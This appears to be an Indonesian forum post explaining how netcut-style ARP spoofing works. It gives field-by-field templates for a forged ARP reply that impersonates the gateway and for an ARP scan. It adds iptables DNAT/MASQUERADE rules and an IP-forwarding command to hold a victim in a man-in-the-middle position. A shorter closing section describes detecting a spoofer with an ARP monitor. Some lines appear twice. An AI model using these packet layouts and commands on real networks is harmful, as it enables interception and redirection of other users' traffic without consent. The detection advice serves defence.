Belajar Cara kerja netcut.
#UNTUK SpoofARP PACKET****************_ETHERNET_FRAME_****************Dest/Broadcast MAC: ac9e172c2adf #TARGET MACSource MAC: 00082278ac58 # MAC muType: 0806******************************************************************_ARP_HEADER_******************Hardware type: 0001Protocol type: 0800Hardware size: 06Protocol size: 04Opcode: 0002 # REPLYSource MAC: 00082278ac58 #MAC muSource IP: 192.168.1.1 # GATEWAY IPDest MAC: ffffffffffff # BROADCAST MACDest IP: 0.0.0.0 # LOCAL IP*************************************************#SCAN MACARP PACKET****************_ETHERNET_FRAME_****************Dest/Broadcast MAC: ffffffffffffSource MAC: 00082278ac58 # MAC muType: 0806******************************************************************_ARP_HEADER_******************Hardware type: 0001Protocol type: 0800Hardware size: 06Protocol size: 04Opcode: 0001 # REQUESTSource MAC: 00082278ac58 # MAC muSource IP: 192.168.1.129 # IP muDest MAC: 000000000000 # LOCAL MACDest IP: 192.168.1.x # x adalah 1-255 -> IP TARGET*************************************************# RULES NETKATiptables -Fiptables -t nat -Fiptables -t nat -I PREROUTING -p tcp -s 0/0 -d 0/0 -j DNAT --to-destination 172.168.1.1iptables -t nat -A POSTROUTING -s 0/0 -d 0/0 -j MASQUERADE# 172.168.1.1 ubah dengan alamat tujuan targetIPTABLES print outbles -t nat -L <Chain PREROUTING (policy ACCEPT)target prot opt source destinationprotoent* getprotobynumber(int)(3) is not implemented on AndroidDNAT tcp -- anywhere anywhere to:172.168.1.1Chain INPUT (policy ACCEPT)target prot opt source destinationChain OUTPUT (policy ACCEPT)target prot opt source destinationChain POSTROUTING (policy ACCEPT)target prot opt source destinationMASQUERADE all -- anywhere anywhereChain natctrl_nat_POSTROUTING (0 references)target prot opt source destinationChain oem_nat_pre (0 references)target prot opt source destinationJangan lupa aktifkan IP forwarding biar target gak lepas:echo 1 > /proc/sys/net/ipv4/ip_forward
Cara mendeteksi pengguna netkat:
dia akan menyiarkan paket ARP secara berulang kali untuk memberitahukan sebuah host bahwa dialah ROUTERNYA.
caranya mudah, jalankan file arpmon.py
dan perhatikan bagian:
Source mac, Source IP, dan Dest IP.
dia akan menyiarkan paket ARP secara berulang kali untuk memberitahukan sebuah host bahwa dialah ROUTERNYA.
caranya mudah, jalankan file arpmon.py
dan perhatikan bagian:
Source mac, Source IP, dan Dest IP.
jika:
Source mac tetap
Source IP adalah IP Gateway
dan Dest IP berubah ubah
maka bisa dipastikan ada yg menggunakan netkat.
dan penyerangnya beralamatkan Source MAC.
Source mac tetap
Source IP adalah IP Gateway
dan Dest IP berubah ubah
maka bisa dipastikan ada yg menggunakan netkat.
dan penyerangnya beralamatkan Source MAC.
Untuk anti netkat nya nanti ane coba buatin :)
atau buat sendiri juga bisa
atau buat sendiri juga bisa
Bahaya dari spoofing jenis ini adalah:
penyerang dapat menyadap semua lalu lintas di dalam jaringan :O
penyerang dapat menyadap semua lalu lintas di dalam jaringan :O
Kecuali kalo pake HTTPS.
tapi ada juga yg bisa mem-break HTTPS
tapi ada juga yg bisa mem-break HTTPS
#cheers~ Grats: FA2AS